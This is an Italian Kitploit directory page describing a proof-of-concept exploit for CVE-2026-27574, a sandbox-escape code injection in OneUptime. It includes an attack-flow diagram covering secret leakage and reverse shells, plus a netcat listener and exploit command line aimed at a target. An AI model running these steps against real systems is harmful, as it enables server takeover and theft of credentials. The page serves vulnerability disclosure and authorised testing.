Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-27574-OneUptime-RCE — Proof-of-concept exploit per CVE-2026-27574, un'iniezione di codice critica in OneUptime che consente l'esecuzione remota di codice e la divulgazione di variabili d'ambiente. | Kitploit
Strumenti/GitHubGitHub/mbanyamer/cve-2026-27574-oneuptime-rce
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHubmbanyamer/cve-2026-27574-oneuptime-rce

CVE-2026-27574-OneUptime-RCE

Proof-of-concept exploit per CVE-2026-27574, un'iniezione di codice critica in OneUptime che consente l'esecuzione remota di codice e la divulgazione di variabili d'ambiente.

Vedi Repository
16 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-27574-OneUptime-RCE

Author Role Country Platform Vulnerability CVE CVSS Status

Panoramica

Exploit proof-of-concept per CVE-2026-27574 – una vulnerabilità critica di code injection (CWE-94) in OneUptime < 10.0.0 che consente l'esecuzione arbitraria di JavaScript nel contesto del probe, portando a completa e alla divulgazione di variabili d'ambiente sensibili.

remote code execution (RCE)

Corretto in: OneUptime 10.0.0 (migrazione a isolated-vm)

Tipo di exploit: Remoto
Autenticazione: Privilegi bassi (qualsiasi membro registrato del progetto)
Impatto: Compromissione completa del server, furto di credenziali, takeover del cluster

Diagramma del Flusso di Attacco

root@kitploit:~
flowchart TD
    A[Start] --> B[Open Registration]
    B --> C[Register New Account]
    C --> D[Create New Project]
    D --> E[Obtain ProjectMember Role]
    E --> F[Create Custom JavaScript Monitor]
    F --> G[Inject Malicious vm Escape Payload]
    G --> H[Probe Executes Code Every ~60s]
    H --> I[Escape vm Context via constructor chain]
    I --> J[Access process & child_process]
    J --> K[Execute System Commands]
    J --> L[Leak Environment Variables]
    K --> M[Read /etc/passwd, id, hostname, etc.]
    L --> N[Extract ONEUPTIME_SECRET, DB/Redis passwords, etc.]
    M --> O[Full RCE Achieved]
    N --> O
    O --> P[Optional: Reverse Shell / Data Exfiltration]
    P --> Q[End - System Compromised]

Funzionalità di Questo PoC

  • Registrazione automatica dell'account
  • Creazione del progetto
  • Creazione di un monitor JavaScript dannoso
  • Divulgazione delle variabili d'ambiente
  • Prova di base dell'esecuzione di comandi
  • Payload opzionale per reverse shell (commentato)

Utilizzo

root@kitploit:~
# Avvia il listener (se si usa la reverse shell)
nc -lvnp 4444

# Esegui l'exploit
python3 exploit.py http://target:3002 --lhost YOUR_IP --lport 4444

Requisiti

  • Python 3.6+
  • Libreria requests (pip install requests)

Avviso Legale ed Etico

Questo codice è fornito esclusivamente a scopo educativo e per test di sicurezza autorizzati.
L'uso non autorizzato contro sistemi di cui non si è proprietari o per i quali non si dispone di esplicito permesso di test è illegale e non etico.

Riferimenti

  • GitHub Advisory GHSA-v264-xqh4-9xmm
  • Patch Commit

Sviluppato da Mohammed Idrees Banyamer • Giordania • @banyamer_security

Scarica lo strumento